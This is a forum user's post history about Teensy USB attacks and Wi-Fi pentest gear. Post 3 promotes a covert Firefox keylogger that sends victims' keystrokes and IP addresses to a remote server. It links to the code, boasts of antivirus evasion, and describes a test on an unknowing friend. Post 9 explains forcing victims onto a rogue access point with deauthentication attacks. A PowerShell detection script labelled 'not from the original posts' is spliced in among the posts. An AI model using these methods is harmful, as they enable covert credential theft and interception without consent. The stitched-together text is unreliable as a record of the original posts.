
sandred

Active Members, 20 posts

Posts posted by sandred

  1. Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?

    If you have a folder C:\kl (maybe from previous runs), then you have to delete it before running it again. Try that, and try to plug it in with nothing else running on your computer; maybe your computer is slow at multitasking and missing some keystrokes.

  2. All the code does is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to Firefox "Hey, there is a plugin that you need to load at C:\kl", and when Firefox starts it loads the code. Once loaded, the plugin watches all the keystrokes made into the browser and quietly posts them to the remote server. The PHP script is placed on the server, which then takes these keys sent and stores them to a file.

    You do not need to load these files into the Teensy. All you need to do is compile the code in Arduino and flash the Teensy with it. When you plug in the Teensy, it just echoes the code to the files and does the rest of that stuff. You can just try it as it is without changing anything. You can always uninstall it after testing.

    Yes, the keylogger is very simple and very effective and completely undetectable, as it is effectively just 2 lines of JavaScript running inside a browser. I already field tested it on one of my friends' computers and he does not think anything ever happened at all when the Teensy installed it. I had to explain the details to him and even after that he does not really believe that's possible. Well, educate the masses I guess.

  3. By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for Firefox. When the Teensy is inserted into USB, it uploads the plugin files into the C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into Firefox by adding a registry key into HKCU\Software\Mozilla\Firefox\Extensions. If Firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin (displayed as "Firefox Security Addon") loads when Firefox starts the next time. If everything goes fine, it will be done in 10 secs.

    The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it.

    Please keep in mind that this is by no means polished or optimized code; bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this cannot be implemented in a more sophisticated way for other plugin-supported browsers and for all OSes. I would love to see somebody optimize it.

    Download the code from here

    http://karmetasploit.com/KL/AllFiles.zip

    If you do not bother to change the server or just want to test it, then the logs are currently stored in this location:

    http://karmetasploit.com/KL/logger.txt

    Some plus points with these kind of keyloggers:

    • It works behind whatever firewalls as long as Firefox gets the internet.
    • 100% AV undetectable
    • You can decide to log or not to log based on ip.

    Why bother stealing cookies when you can get all the key strokes. :)
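A defender-side check for the registration that posts 2 and 3 above describe, added here as an example and not code from the original posts: it lists the Firefox extension entries under the HKCU key named in post 3 (plus, as an assumption, the machine-wide keys) and flags any whose path lies outside Program Files, which is what an install from C:\kl looks like. The trusted-path heuristic is an assumption, not part of the posts.

```powershell
# Added example (not from the original posts). Firefox reads extension
# registrations as  <extension id> = <path to .xpi or unpacked dir>  from
# these keys; the HKCU one is writable without admin rights, which is what
# the posts rely on. The HKLM keys are included as an assumption.
$hives = @(
    'HKCU:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\WOW6432Node\Mozilla\Firefox\Extensions'
)
# Note properties PowerShell adds to every Get-ItemProperty result; skip them.
$providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
# Assumption: legitimate extension registrations point into Program Files.
$trustedRoots  = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

$findings = foreach ($hive in $hives) {
    if (-not (Test-Path -LiteralPath $hive)) { continue }
    $props = Get-ItemProperty -LiteralPath $hive
    foreach ($p in $props.PSObject.Properties) {
        if ($providerProps -contains $p.Name) { continue }
        $path = [string]$p.Value
        $inTrusted = $false
        foreach ($root in $trustedRoots) {
            if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $inTrusted = $true
            }
        }
        [pscustomobject]@{
            Hive        = $hive
            ExtensionId = $p.Name
            Path        = $path
            PathExists  = ($path -ne '') -and (Test-Path -LiteralPath $path)
            PerUser     = $hive -like 'HKCU:*'   # registered without admin rights
            Suspicious  = -not $inTrusted        # e.g. C:\kl in the post
        }
    }
}

$findings | Format-Table -AutoSize
$findings | Where-Object Suspicious | ForEach-Object {
    Write-Warning ("Review {0} -> {1} (value '{2}')" -f $_.Hive, $_.Path, $_.ExtensionId)
}
```

Run it in the account whose Firefox profile you are checking, since the HKCU hive is per user; a flagged entry is worth comparing against about:addons before removing the value.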

  4. I was trying to get a feel for system delays and general programming flow when using the Teensy. So I thought I would just do this for the heck of it, and when I did it... why not share it. It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems.

    A few things learnt while doing this:

    • Delays are so damn important and they just vary from system to system. You almost need to think of the slowest machines. That brings me to my second point.
    • Feedback from the system is critical; we need to figure out how to get some feedback from the system.

    /*
    .prints the obfuscated ascii heart
    .gets the heart into recognizable shape
    .says I love you
    .beats the heart <-- this may not work on slower machines
    ***Close all script/text/other programs with text input before running this.
    This program can be highly destructive if notepad is not launched for some reason.
    Use it at your own risk.***
    */
    
    #include <string.h>
    
    int ledPin = 11;
    int i, j, k;
    int nBeats = 5;   // number of heartbeats
    int fHigh = 14;   // max font size
    int fLow = 6;     // min font size
    int nSpaces = 20; // times to move the art to the right
    int cn[] = {0, 0, 0, 0, 0};                        // count of each replaced char in the art, used to replace it back
    const char *rc[] = {"_", " ", "I", "Love", "You"}; // original tokens of the ascii art
    const char *rw[] = {"66", "99", "1", "4", "3"};    // tokens they were replaced with to obfuscate it
    const char *line[] = {"999999999999999999#991994999999999999999999999999#99199499",
      "999999999999#991994993..99999999999999#991994993...#",
      "99999999#991994993...#99199999999#991994993...#99199",
      "999999#991994993...#991994993...#9966666666666666#99199",
      "9999#991994993...#991994993...#99666666666666666666#99199",
      "99#991994993...#991994993...#99199Lo66666666666666#99199",
      "99#991994993...#991994993...#99199499Y666666666666#",
      "#991994993...#991994993...#991994993..6666#991",
      "#991994993...#991994993...#991994993...#9966#",
      "#991994993...#991994993...#991994993...#99199",
      "#991994993...#991994993...#991994993...#99199",
      "99#991994993...#991994993...#991994993...#99",
      "9999#991994993...#991994993...#991994993...",
      "99999999#991994993...#991994993...#991994993",
      "999999999999#991994993...#991994993...#99199Lov",
      "999999999999999999#991994993...#991994993...#",
      "999999999999999999999999#991994993...#99199499Y",
      "9999999999999999999999999999#991994993...#99199L",
      "9999999999999999999999999999999999#991994993.",
      "99999999999999999999999999999999999999#99199499",
      "999999999999999999999999999999999999999999#99199Lo",
      "99999999999999999999999999999999999999999999#99199",
      "9999999999999999999999999999999999999999999999#99"}; // ascii art to be printed
    
    void setup() {
      pinMode(ledPin, OUTPUT); // set led
      delay(2000);             // not needed
    }
    
    void loop() {
      delay(2000);                         // wait until the HID is detected
      digitalWrite(ledPin, HIGH);          // turn led on
      WriteMessage();                      // main function
      KeyCombo(MODIFIERKEY_CTRL, KEY_END); // just in case the font change function fails, this will not destroy the printed ascii
      KeyPress(KEY_ENTER);
      delay(2000);                         // let them watch it for a couple of seconds
      for (j = 1; j <= nBeats; j++) {      // make the heart beat by changing the font size
        Beat();                            // this will not work on slower machines
      }
      ChFont(10);                          // set the font size back to the default 10
      digitalWrite(ledPin, LOW);           // turn led off, we are done
      delay(50000);                        // delay the loop
    }
    
    void WriteMessage() {
    
      runcmd("notepad.exe"); // open notepad from the Run dialog
      delay(2000);           // wait until notepad is open
      sysMenu(KEY_X);        // maximize notepad
      delay(1000);           // wait until the command has finished
      ChFont(10);            // set the font size to the default 10
    
      for (i = 0; i < sizeof(line) / sizeof(line[0]); i++) { // loop through all lines of the art
        for (j = 0; line[i][j] != '\0'; j++) {
          if (line[i][j] == rw[0][0]) { cn[0]++; } // count each char to be replaced
          if (line[i][j] == rw[1][0]) { cn[1]++; }
          if (line[i][j] == rw[2][0]) { cn[2]++; }
          if (line[i][j] == rw[3][0]) { cn[3]++; }
          if (line[i][j] == rw[4][0]) { cn[4]++; }
    
          Keyboard.print(line[i][j]); // print the art letter by letter
          delay(20);                  // this gives something to stare at on screen
        }
        KeyPress(KEY_ENTER); // new line
      }
    
      for (i = 0; i < nSpaces; i++) { // move the whole art to the right, roughly to the center of notepad
        KeyCombo(MODIFIERKEY_CTRL, KEY_HOME);
        for (j = 0; j < sizeof(line) / sizeof(line[0]); j++) { // one line at a time, through all lines
          KeyPress(KEY_SPACE);
          //delay(50);
          KeyPress(KEY_DOWN);
          KeyPress(KEY_HOME);
        }
      }
    
      // delay between single replacements for each token (the per-case values of the original switch)
      const int rDelay[] = {100, 30, 70, 70, 70};
    
      for (i = 0; i < sizeof(rw) / sizeof(rw[0]); i++) { // replace tokens one by one
        KeyCombo(MODIFIERKEY_CTRL, KEY_HOME);
        KeyCombo(MODIFIERKEY_CTRL, KEY_H); // open the Replace dialog
        delay(300);
        sysMenu(KEY_M);
        delay(300);            // these delays are important
        ClicknMove(-127, 127); // drag the Replace dialog to the bottom left, out of the way
        delay(300);            // important delay to make the click work
    
        Keyboard.print(rw[i]); // "Find what"
        KeyPress(KEY_TAB);
        Keyboard.print(rc[i]); // "Replace with"
        // cn[i] counts single chars, so divide by the token length to get the number of
        // occurrences; replace one at a time but stop a few short
        int nReplace = cn[i] / (int)strlen(rw[i]) - 5;
        for (j = 1; j < nReplace; j++) {
          KeyCombo(MODIFIERKEY_ALT, KEY_R); // Replace (next occurrence)
          delay(rDelay[i]);                 // delay to stare at the action
        }
    
        KeyCombo(MODIFIERKEY_ALT, KEY_A); // replace the remaining few with Replace All
        delay(30);                        // important for the above command to finish
        sysMenu(KEY_C);                   // close the Replace box
      }
    }
    
    void Beat() {
      for (i = fLow; i <= fHigh; i++) { // increase the font one size at a time
        ChFont(i);
        delay(20);
      }
      for (k = fHigh; k >= fLow; --k) { // decrease the font one size at a time
        ChFont(k);
        delay(20);
      }
    }
    
    void runcmd(const char *cmd) {
      KeyCombo(MODIFIERKEY_GUI, KEY_R); // open the Run dialog
      delay(1500);                      // wait for it to open
      Keyboard.print(cmd);              // type the command
      KeyPress(KEY_ENTER);              // execute it
    }
    
    void KeyPress(int SomeKey) {
      Keyboard.set_key1(SomeKey); // set some key
      Keyboard.send_now(); // "press" some key
      // clear some key
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }
    
    void KeyCombo(int ModKey,int SomeKey) {
      Keyboard.set_modifier(ModKey); //set one or more modifier keys
      Keyboard.set_key1(SomeKey); // set regular key
      Keyboard.send_now(); // send strokes
      // clear keys
      Keyboard.set_modifier(0); // prep release of control keys
      Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
      Keyboard.send_now();
    }
    
    void sysMenu(int SomeKey) {
      Keyboard.set_modifier(MODIFIERKEY_ALT); //set one or more modifier keys
      Keyboard.set_key1(KEY_SPACE); // set regular key
      Keyboard.send_now(); // send strokes
      // clear keys
      Keyboard.set_modifier(0); // prep release of control keys
      Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
      Keyboard.send_now();
      delay(10);
      Keyboard.set_key1(SomeKey);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
    }
    
    void ClicknMove(int x, int y) {
      Mouse.set_buttons(1, 0, 0); // press the left button
      Mouse.move(x, y);           // drag while it is held
      Mouse.set_buttons(0, 0, 0); // release
    }
    
    void ChFont(int sz) {
      KeyCombo(MODIFIERKEY_ALT, KEY_O); // open the Format menu
      delay(50);                        // magic number that works on my machine
      KeyPress(KEY_F);                  // open the Font window
      delay(50);
      KeyPress(KEY_TAB);                // go to font size
      KeyPress(KEY_TAB);
      Keyboard.print(sz);               // type the new size
      KeyPress(KEY_ENTER);
    }

  5. It was a very interesting talk at Shmoocon 2010 about GSM MITM using USRP and OpenBTS. The only downside of it being the cost.

    I came across this today and you might already be aware of it from AT&T: http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with, but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm, sounds challenging and interesting. Have any of you looked into it? Maybe we can use this instead of the costly USRP module for GSM MITM?

  6. Hey, Thanks for the quick replies...I'm still having some problems.

    I followed the link http://karmetasploit.com/archives/55

    My dhcp and network files are exactly the same as the examples in the link.

    Before doing anything I used this line to enable the wicd manager. Then I launched the wicd GUI, entered my AP's WPA2 key and was able to go online just fine.

    /etc/init.d/wicd start

    Back to the original problem: it seems that I'm unable to maintain both wlan0 and eth0 at the same time. I can only connect to one of them at a time.

    Should I set my wlan0 (wireless) to master mode or something? Or am I still doing something wrong?

    Do not use wicd or wicd-client. If I remember it correctly, wicd disconnects you from either one of them as soon as you connect to the other. So if you want to test it and still want to use wicd, connect to the internet as you normally do using wicd, then right click on the wicd client icon and completely exit it. Then test if you are still connected to the internet. After that bring eth0 up using the above commands and you should be fine. I believe if you don't exit wicd before bringing eth0 up it will disconnect you from wlan0. I think, but I am not sure. Try it.

  7. I am new to this USB thing... so please bear with me.

    So here are the nice tools developed by DB. I downloaded them, made an ISO containing all the tools, including an autorun.inf to launch them all. The thing that I don't understand is that they are all on a "CD-ROM" drive that can't write data (aka dump). So launching them is useless if they can't dump. How do you launch them from a writable portion of the jump drive?

    The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could someone please get me started on "launching files"?

  8. Then how can it do both things at the same time? You can only multitask (time share), I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.

    I'd agree with that, but I'm going to put them both on the same because people are asking for it. There will be appropriate warnings.

  9. Best bet to get the most out of mdk3 and Jasager is to run them on separate Fons. Run legend/mdk3/aircrack on one Fon; use it to deauth your target client or AP. That forces your victims to connect to Jasager running on the second Fon automatically. It totally works.

    Just installed "libpthread_0.9.28-8_mips.ipk".

    Now it works like a charm ;)

    <3 <3 <3

  10. When I tried to upgrade... I got this error:

    root@OpenWrt:~# ipkg install jasager_2.1.ipk
    Upgrading jasager on root from 1 to 2...
    Nothing to be done
    An error ocurred, return value: 1.
    Collected errors:
    ERROR: Cannot satisfy the following dependencies for jasager:
    ruby-core ruby-rexml

    What should I do?

  11. I am trying to package the new version of MDK3 V5 into an ipk file but with no luck. Could you please explain the process in depth or upload the ipk file somewhere?

    Thanks

    I figured out how the Piranha firmware built the mdk3 package today and I was able to compile my own package :D . mdk3 does kind of work alongside Karma but there are some minor issues. For example, when I tried setting up Jasager on channel 6 and set mdk to channel hop, it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it yourself, and maybe someone will be kind and upload the package for the people that don't know how to build it.

    include $(TOPDIR)/rules.mk
    
    PKG_NAME:=mdk3
    PKG_REV:=5
    PKG_VERSION:=v$(PKG_REV)
    PKG_RELEASE:=1
    
    PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2
    PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
    PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION)
    PKG_SOURCE_VERSION:=$(PKG_REV)
    #PKG_SOURCE_PROTO:=svn
    
    include $(INCLUDE_DIR)/package.mk
    
    define Package/mdk3
      SECTION:=net
      CATEGORY:=Network
      TITLE:=MDK3
      URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
      SUBMENU:=wireless
    endef
    
    define Package/mdk3/description
    Tool to exploit wireless vulnerabilities
    endef
    
    define Build/Configure
    endef
    
    define Package/mdk3/install
        $(INSTALL_DIR) $(1)/usr/sbin
        $(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/
    endef
    
    $(eval $(call BuildPackage,mdk3))
